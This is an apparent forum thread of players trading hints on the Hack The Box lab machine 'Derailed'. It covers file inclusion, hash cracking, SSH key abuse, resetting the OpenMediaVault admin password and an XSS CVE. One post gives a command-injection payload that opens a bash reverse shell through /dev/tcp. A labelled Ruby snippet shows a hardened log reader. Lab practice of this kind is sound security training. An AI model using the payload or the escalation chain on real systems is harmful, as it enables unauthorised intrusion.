Derailed - HTB [Discussion]
(November 22, 2022, 07:24 AM)meowmeowattack Wrote:
(November 22, 2022, 05:45 AM)deer Wrote:
(November 21, 2022, 07:48 PM)toinkz Wrote: How did the recently patched unintended privilege escalation Chrome Driver root work?


it is not patched still


(November 22, 2022, 04:43 AM)meowmeowattack Wrote:
(November 21, 2022, 09:32 PM)nuki Wrote:
Exa Wrote: I found the LFI. Any hint on what to do next?

Edit: I found development.sqlite3.


Cracking the hash of toby works pretty well, unfortunately it doesn't lead anywhere. 
I already tried bruteforcing the ssh login for the user associated to toby with a list of album names and artists from https://en.wikipedia.org/wiki/Toby_Wright

No success so far for the last couple of hours


the cracked hash can be used to login as openmediavault-webgui, but there doesn't seem to be anything exploitable by examining the version
in the /etc/openmediavault/config.xml, it does highlight two users, one does exist on the filesystem, one doesn't


if you have an ssh as openmediavault-webgui, I offer you a couple nudges

/usr/sbin/omv-firstaid

127.0.0.1:80


thanks, rails is in ssh group, hence creating a public/private key pair can login via ssh. then switch to openmediavault-webgui can reset omv admin password. now i suppose the omv web can be used to add a user with root privilege or promoting an existing user to root?

i got 403 forbidden =。=
Reply
(November 22, 2022, 05:45 AM)deer Wrote: if you have an ssh as openmediavault-webgui, I offer you a couple nudges

/usr/sbin/omv-firstaid

127.0.0.1:80


I could change the admin password by running /usr/sbin/omv-firstaid as the openmediavault-webgui user and then log into 127.0.0.1:80 (OpenMediaVault 6.0.27-1) as admin.
Reply
Exa Wrote: I tried to SSH as openmediavault-webgui with that password, but that didn't work. Anyway, @deer posted a nice summary. RCE via open(report_log) was the next step. Then su as openmediavault-webgui.

Maybe an RCE like this (with a netcat started locally):

authenticity_token=0p4fReu74eXtUleAq5Cg8DTck3WDQl_2f3Po2RzncTwv2K3Wq0x8ffKN2XIHdbyCWIYaYTYpbwExaYVzgUna_w&report_log=|bash+-c+'bash+-i+>%26+/dev/tcp//+0>%261'
Reply
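Added example, not part of any post in this thread and not the box's own code: the `open(report_log)` issue mentioned above exists because Ruby's `Kernel#open` has historically treated an argument beginning with `|` as a command to run, whereas `File.open` only ever opens paths. A hardened reader for such a parameter is sketched below; `LOG_ROOT`, `read_report_log` and `try_read` are hypothetical names, and the log file is constructed sample data.

```ruby
require "tmpdir"

# Hypothetical directory holding report logs (assumption for this example).
LOG_ROOT = Dir.mktmpdir("report-logs")
File.write(File.join(LOG_ROOT, "report_2022.log"), "constructed sample log\n")

class UnsafeLogName < StandardError; end

# Risky pattern (described only, never executed here): Kernel#open(name)
# spawns a subprocess when name starts with "|" on Ruby versions that
# still support pipe-open, so a request parameter becomes a command.
#
# Hardened reader: allow-list the file name, resolve it under the log
# root, and use File.open, which never interprets "|".
def read_report_log(name, root: LOG_ROOT)
  name = name.to_s
  # Plain file names only: no "|", no "/", no leading dot, no NUL byte.
  unless name.match?(/\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}\z/)
    raise UnsafeLogName, "rejected log name: #{name.inspect}"
  end
  real_root = File.realpath(root)
  begin
    # realpath follows symlinks, so a link pointing elsewhere is exposed.
    real = File.realpath(File.join(real_root, name))
  rescue SystemCallError
    raise UnsafeLogName, "no such log: #{name.inspect}"
  end
  # Defence in depth: the resolved path must stay inside the log root.
  unless real.start_with?(real_root + File::SEPARATOR)
    raise UnsafeLogName, "path escapes log root: #{name.inspect}"
  end
  File.open(real, "r") { |f| f.read }
end

# Returns :ok or :rejected so callers and tests can check the outcome.
def try_read(name)
  read_report_log(name)
  :ok
rescue UnsafeLogName
  :rejected
end
```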
(November 22, 2022, 08:15 AM)Exa Wrote:
(November 22, 2022, 05:45 AM)deer Wrote: if you have an ssh as openmediavault-webgui, I offer you a couple nudges

/usr/sbin/omv-firstaid

127.0.0.1:80


I could change the admin password by running /usr/sbin/omv-firstaid as the openmediavault-webgui user and then log into 127.0.0.1:80 (OpenMediaVault 6.0.27-1) as admin.


when changing the user groups, the app will return an "invalid context role". this error can be found in the omv source code in openmediavault/deb/openmediavault/usr/share/php/openmediavault/rpc/serviceabstract.inc downloaded here: https://github.com/openmediavault/openmediavault

on line 212, so the php code is complaining that the context["role"] is missing. i guess the author of this box deliberately removed it as an obstacle.
Reply
(November 22, 2022, 09:06 AM)meowmeowattack Wrote:
(November 22, 2022, 08:15 AM)Exa Wrote:
(November 22, 2022, 05:45 AM)deer Wrote: if you have an ssh as openmediavault-webgui, I offer you a couple nudges

/usr/sbin/omv-firstaid

127.0.0.1:80


I could change the admin password by running /usr/sbin/omv-firstaid as the openmediavault-webgui user and then log into 127.0.0.1:80 (OpenMediaVault 6.0.27-1) as admin.


when changing the user groups, the app will return an "invalid context role". this error can be found in the omv source code in openmediavault/deb/openmediavault/usr/share/php/openmediavault/rpc/serviceabstract.inc downloaded here: https://github.com/openmediavault/openmediavault

on line 212, so the php code is complaining that the context["role"] is missing. i guess the author of this box deliberately removed it as an obstacle.


Check /etc/openmediavault/config.xml. In the user section is something about ssh-keys ;)
Just got root
Reply
Any Hint what to do after i became admin of openmediavault?


Fuck, now they recreated my instance, i cannot create an admin user in the app anymore, any ssh key for rails is also wiped. FUUUUCK


Restart. How can i become administrator in the webapp other than the known way by setting the role in the registration process? Any hint for me?
Reply
(November 22, 2022, 10:07 AM)s0jnik Wrote: Any Hint what to do after i became admin of openmediavault?


Fuck, now they recreated my instance, i cannot create an admin user in the app anymore, any ssh key for rails is also wiped. FUUUUCK


Restart. How can i become administrator in the webapp other than the known way by setting the role in the registration process? Any hint for me?


What a pity, my box was reset too.
Reply
(November 22, 2022, 11:27 AM)Exa Wrote:
(November 22, 2022, 10:07 AM)s0jnik Wrote: Any Hint what to do after i became admin of openmediavault?


Fuck, now they recreated my instance, i cannot create an admin user in the app anymore, any ssh key for rails is also wiped. FUUUUCK


Restart. How can i become administrator in the webapp other than the known way by setting the role in the registration process? Any hint for me?


What a pity, my box was reset too.


Me too, I'm just about to try that public key =. =, now start from scratch


Does anyone have the public key in /etc/openmediavault/config.xml?
Reply
now start from scratch
Do you have an entry point already?
Reply
regarding xss for the entry point. i can find this information so far: rails-html-sanitizer 1.4.2 is vulnerable to cross-site scripting when `select` and `style` tags are allowed (CVE-2022-32209). it does look exploitable, but with the cookie being httponly, and there doesn't seem to be any user role changing form, i fail to think of how this would help in this exercise.
Reply

